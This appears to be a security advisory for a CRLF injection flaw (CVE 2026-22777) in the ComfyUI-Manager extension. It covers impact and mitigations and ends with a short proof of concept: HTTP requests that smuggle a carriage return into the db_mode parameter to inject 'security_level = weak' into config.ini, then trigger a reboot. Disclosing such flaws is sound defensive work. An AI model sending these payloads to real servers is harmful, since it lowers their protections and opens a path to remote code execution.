ComfyUI-Manager CRLF Injection in Configuration Handler – CVE 2026-22777

Vendor Discription:-

ComfyUI-Manager is an extension designed to enhance the functionality and usability of the ComfyUI interface for AI image generation workflows. It provides tools for managing custom nodes, models, and updates directly from the web interface, simplifying maintenance and configuration tasks. The manager streamlines installation, version control, and dependency handling, making it easier for users to extend their AI pipelines. By centralizing resource management, it reduces manual configuration errors and improves operational efficiency. Overall, it serves as a convenience-focused management layer that improves workflow organization within the ComfyUI ecosystem.

CVE 2026-22777 Description: –

A previously published vulnerability (CVE-2025-67303) revealed that configuration files were kept in an unsecured directory (user/default/ComfyUI-Manager/), allowing attackers to read and overwrite config.ini via the /userdata/ API. This allowed attackers to decrease security settings (such as security_level) and eventually achieve remote code execution (RCE).

To fix this issue, ComfyUI-Manager version 3.38 moved important configuration data to the protected __manager directory, which is inaccessible via the /userdata/ API.

However, the mitigation was not complete.

Prior to 3.39.2, including in the 4.0.0 to 4.0.4 release range, the write_config() function does not properly sanitize user-supplied input before writing it to the config.ini file. Specifically, it does not filter or neutralize carriage return (\r) and newline (\n) characters, leaving a CRLF injection vulnerability.

An attacker might exploit this weakness by introducing malicious CRLF sequences into HTTP query parameters of ComfyUI-Manager configuration endpoints (for example, /api/manager/db_mode). This enables the unrestricted insertion of additional configuration directives into config.ini.

Impact

• Inject arbitrary key-value pairs into the configuration file
• Modify security-sensitive parameters (e.g., downgrade security_level from normal to weak)
• Bypass intended configuration protections introduced in previous patches
• Recreate conditions similar to CVE-2025-67303
• Potentially achieve remote code execution (RCE) through subsequent attack chains

Mitigations

• Upgrade to ComfyUI-Manager version 3.39.2 or later, or 4.0.5 and above
• Implement strict input validation and sanitization to strip or encode CRLF characters
• Enforce server-side validation for configuration parameters
• Restrict network exposure where possible (avoid using --listen unless necessary)

POC

First, confirm that the old CVE-2025-67303 vulnerability no longer works – attempting to read the configuration file via the /userdata/ API will produce a 404 response, as the configuration has been relocated to the protected __manager directory.

GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
Host: your-ip:8188

To get around the security restriction, submit a request to the /api/manager/db_mode endpoint with CRLF. The %0D in the payload is a URL-encoded carriage return character (\r), which enables Python’s configparser to regard everything after it as a new configuration entry, inserting security_level = weak into the configuration file.

GET /api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak HTTP/1.1
Host: your-ip:8188

After the injection, restart the ComfyUI server by sending a request to /api/manager/reboot to apply the updated settings.